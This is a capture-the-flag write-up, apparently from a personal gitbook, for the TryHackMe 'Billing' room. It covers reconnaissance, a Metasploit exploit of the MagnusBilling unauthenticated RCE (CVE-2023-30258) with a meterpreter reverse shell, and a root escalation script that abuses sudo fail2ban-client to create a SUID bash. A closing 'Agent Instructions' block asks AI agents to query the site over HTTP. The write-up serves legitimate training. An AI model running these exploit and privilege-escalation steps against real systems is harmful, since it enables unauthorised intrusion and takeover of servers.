# Billing

{% embed url="<https://tryhackme.com/room/billing>" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

## Recon

We start with a Nmap scan and find four open ports. Among them, we have a web server on port `80`, a MariaDB service on port `3306` and an Astersik Call Manager on `5038`.

<figure><img src="/files/NAlGyMcSR6k0z3KrvwsB" alt=""><figcaption></figcaption></figure>

From the default script scan, we can also see the content of robots.txt, which has a disallowed entry for the `/mbilling` directory.

```
| http-robots.txt: 1 disallowed entry 
|_/mbilling/

```

We visit the directory and have a login page in front of us. Furthermore, we can see the name `MagnusBilling` in the title.

```
http://billing.thm/mbilling/ 
```

<figure><img src="/files/o2vtKB1CrW79pHUMRwn1" alt=""><figcaption></figcaption></figure>

After a short search, we see that it seems like an open-source VoIP billing and management system for managing SIP trunks, VoIP calls, and customer billing. It provides tools for call routing, monitoring, and invoicing.

<figure><img src="/files/CsJ5KX0NG9MXNWNqDZQb" alt=""><figcaption></figcaption></figure>

## Shell As asterisk

This has an unauthenticated remote command execution vulnerability `CVE-2023-30258`, which is available as a manual exploit but is also present in the Metasploit framework.

{% embed url="<https://www.rapid7.com/db/modules/exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258/>" %}

We set up the exploit in the Metasploit framework and give it a try.

```
└─$ msfconsole 
Metasploit tip: Use the analyze command to suggest runnable modules for 
hosts
                                                  
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                 
%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                 
%%  %  %%%%%%%%   %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%                                                                 
%%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                 
%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                 
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                 
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                 
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%                                                                 
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%                                                                 
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%                                                                 
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%                                                                 
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %                                                                 
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%                                                                 
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%                                                                 
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                 
                                                                                                                                              

       =[ metasploit v6.4.0-dev                           ]
+ -- --=[ 2405 exploits - 1239 auxiliary - 422 post       ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search magnus

Matching Modules
================

   #  Name                                                        Disclosure Date  Rank       Check  Description
   -  ----                                                        ---------------  ----       -----  -----------
   0  exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258  2023-06-26       excellent  Yes    MagnusBilling application unauthenticated Remote Command Execution.
   1    \_ target: PHP                                            .                .          .      .
   2    \_ target: Unix Command                                   .                .          .      .
   3    \_ target: Linux Dropper                                  .                .          .      .


Interact with a module by name or index. For example info 3, use 3 or use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
After interacting with a module you can manually set a TARGET with set TARGET 'Linux Dropper'

msf6 > use 0
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > show options

Module options (exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.h
                                         tml
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /mbilling        yes       The MagnusBilling endpoint URL
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0
                                       .0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


   When TARGET is 0:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   WEBSHELL                   no        The name of the webshell with extension. Webshell name will be randomly generated if left unset.


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHP



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set LHOST 10.14.90.235
LHOST => 10.14.90.235
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set RHOST billing.thm
RHOST => billing.thm
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > run

```

We get a shell and are the user `asterisk`.

<figure><img src="/files/TLwPODJDv9AeujGnghk4" alt=""><figcaption></figcaption></figure>

We set up another listener, and set up another reverse shell. Due to the fact that I am not so familiar with the Metasploit framework and would like to have an upgraded shell.

<figure><img src="/files/YnxItz3kyu9yK1Uw7gLW" alt=""><figcaption></figcaption></figure>

To upgrade the shell, we follow the instructions provided here:

{% embed url="<https://0xffsec.com/handbook/shells/full-tty/>" %}

<figure><img src="/files/2Rlzx5FGythawVlw5p7D" alt=""><figcaption></figcaption></figure>

We find another user, magnus in `/etc/passwd`. We have access to the home directory of the user and can read the user flag here.

<figure><img src="/files/zDQn6A7pWrnN1HCYsSV7" alt=""><figcaption></figcaption></figure>

## Shell As root

As `asterisk`, we have the permission to execute `sudo -l` without password, and we are allowed to execute `/usr/bin/fail2ban-client` with root permissions.

Fail2ban is a security tool that monitors log files for suspicious activity and blocks IP addresses after repeated failed login attempts. It helps protect servers from brute-force attacks by automatically adding firewall rules.

<figure><img src="/files/WLYbWwHzTAmkockspW4m" alt=""><figcaption></figcaption></figure>

The following resource provides various insights into how this could be used to extend your privileges.

{% embed url="<https://juggernaut-sec.com/fail2ban-lpe/>" %}

There you can find an approach to customize a config in the config directory and place code in it that is to be executed with root permissions. Unfortunately, we only have read-only access to the directory...

```
/etc/fail2ban
```

<figure><img src="/files/E0KnP9Tcvo4lwXFPEcqL" alt=""><figcaption></figcaption></figure>

&#x20;... and its contents.

<figure><img src="/files/Lfk4VqbiGqBZuebebudL" alt=""><figcaption></figcaption></figure>

But we can remedy this. We can copy the configuration directory and refer to it when executing `fail2ban`.

In the `fail2ban-client` command, the `-c` option specifies the **configuration directory** for Fail2Ban.

```
sudo fail2ban-client -c /tmp/fail2ban/ -v restart
```

With `rsync -av /etc/fail2ban/ /tmp/fail2ban/` we recursively copy the contents of `/etc/fail2ban/` to `/tmp/fail2ban/`.

```
rsync -av /etc/fail2ban/ /tmp/fail2ban/
```

We can then follow the Exploiting Fail2Ban and Getting a Root Shell section from `https://juggernaut-sec.com/fail2ban-lpe/` and customize `action.d/iptables-multiport.conf` and restart the service or write our own config.

With the following, we write our own config, which executes a script, which in turn copies `/bin/bash` to `/tmp/bash` and makes it a `SUID binary` to get a root shell.

```
rsync -av /etc/fail2ban/ /tmp/fail2ban/

cat > /tmp/script <<EOF
#!/bin/sh
cp /bin/bash /tmp/bash
chmod 755 /tmp/bash
chmod u+s /tmp/bash
EOF
chmod +x /tmp/script


cat > /tmp/fail2ban/action.d/custom-start-command.conf <<EOF
[Definition]
actionstart = /tmp/script
EOF

cat >> /tmp/fail2ban/jail.local <<EOF
[my-custom-jail]
enabled = true
action = custom-start-command
EOF

cat > /tmp/fail2ban/filter.d/my-custom-jail.conf <<EOF
[Definition]
EOF

sudo fail2ban-client -c /tmp/fail2ban/ -v restart
```

After running the script we have a SUID binary at `/tmp/bash` and can execute it with the `-p` parameter to get a `root` shell. We then find the root flag at `/root/root.txt`.

<figure><img src="/files/IkBN4sPZh4f932IojTSb" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xb0b.gitbook.io/writeups/tryhackme/2025/billing.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.